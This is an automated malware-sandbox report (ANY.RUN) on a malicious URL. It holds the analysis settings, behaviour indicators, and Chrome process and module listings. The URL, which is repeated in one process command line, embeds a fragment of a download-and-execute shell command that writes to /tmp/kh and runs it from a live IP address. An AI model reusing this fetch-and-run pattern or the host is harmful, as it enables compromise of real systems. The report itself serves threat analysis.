General Info

URL

http://194.147.32.131/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$%20HTTP/1.1

Full analysis
https://app.any.run/tasks/048707fa-82f6-4d83-bdf5-ebeba4c4c906
Verdict
Malicious activity
Analysis date
9/11/2019, 09:18:24
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
300 seconds
Additional time used
240 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.34.7)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB4019990
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Loads dropped or rewritten executable
  • SearchProtocolHost.exe (PID: 1508)
Executable content was dropped or overwritten
  • firefox.exe (PID: 2992)
Dropped object may contain TOR URL's
  • firefox.exe (PID: 2992)
Reads CPU info
  • firefox.exe (PID: 1016)
  • firefox.exe (PID: 2992)
Creates files in the user directory
  • firefox.exe (PID: 1016)
  • firefox.exe (PID: 2992)
Dropped object may contain Bitcoin addresses
  • firefox.exe (PID: 2992)
Application launched itself
  • firefox.exe (PID: 1016)
  • firefox.exe (PID: 3820)
  • firefox.exe (PID: 2992)
  • chrome.exe (PID: 2796)
Reads the hosts file
  • chrome.exe (PID: 2536)
  • chrome.exe (PID: 2796)
Manual execution by user
  • firefox.exe (PID: 3840)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Screenshots

Processes

Total processes
64
Monitored processes
26
Malicious processes
1
Suspicious processes
0

Behavior graph

+
start chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs firefox.exe no specs firefox.exe pingsender.exe firefox.exe no specs firefox.exe firefox.exe firefox.exe searchprotocolhost.exe no specs firefox.exe firefox.exe firefox.exe firefox.exe firefox.exe
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
2796
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://194.147.32.131/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$%20HTTP/1.1"
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
3221225547
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ole32.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\hid.dll
c:\windows\system32\propsys.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\credui.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\winusb.dll
c:\windows\system32\msi.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\mscms.dll
c:\windows\system32\winsta.dll
c:\windows\system32\wlanapi.dll
c:\windows\system32\wlanutil.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\wpc.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\samlib.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\firewallapi.dll
c:\windows\system32\kbdus.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\wbem\wmiperfinst.dll
c:\windows\system32\pdh.dll
c:\windows\system32\audioses.dll

PID
3620
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=75.0.3770.100 --initial-client-data=0x7c,0x80,0x84,0x78,0x88,0x6fdea9d0,0x6fdea9e0,0x6fdea9ec
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll

PID
2864
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2800 --on-initialized-event-handle=312 --parent-handle=316 /prefetch:6
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ole32.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_watcher.dll

PID
4084
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=996,18427199864753977657,3076804926658334403,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAADgAAAgAQAAAAAAAAAAAGAAAAAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=6403556444186381180 --mojo-platform-channel-handle=1016 --ignored=" --type=renderer " /prefetch:2
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\mf.dll
c:\windows\system32\atl.dll
c:\windows\system32\mfplat.dll
c:\windows\system32\avrt.dll
c:\windows\system32\ksuser.dll
c:\windows\system32\msmpeg2vdec.dll
c:\windows\system32\evr.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\slc.dll
c:\windows\system32\sqmapi.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\dxva2.dll
c:\windows\system32\d3dcompiler_47.dll
c:\windows\system32\ddraw.dll
c:\windows\system32\dciman32.dll
c:\program files\google\chrome\application\75.0.3770.100\swiftshader\libglesv2.dll
c:\program files\google\chrome\application\75.0.3770.100\swiftshader\libegl.dll

PID
2536
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=996,18427199864753977657,3076804926658334403,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=network --service-request-channel-token=7776949043529827813 --mojo-platform-channel-handle=1632 /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\msctf.dll
c:\windows\system32\imm32.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wship6.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptnet.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\ntmarta.dll

PID
2076
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,18427199864753977657,3076804926658334403,131072 --enable-features=PasswordImport --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=18034130898918191065 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2236 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3244
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,18427199864753977657,3076804926658334403,131072 --enable-features=PasswordImport --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=13732627922918924944 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2248 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2168
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,18427199864753977657,3076804926658334403,131072 --enable-features=PasswordImport --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=1457212606959836757 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2444 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3364
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=996,18427199864753977657,3076804926658334403,131072 --enable-features=PasswordImport --disable-gpu-sandbox --use-gl=disabled --gpu-preferences=KAAAAAAAAADgAAAgAQAAAAAAAAAAAGAAAAAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=14829158658673968491 --mojo-platform-channel-handle=3352 /prefetch:2
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
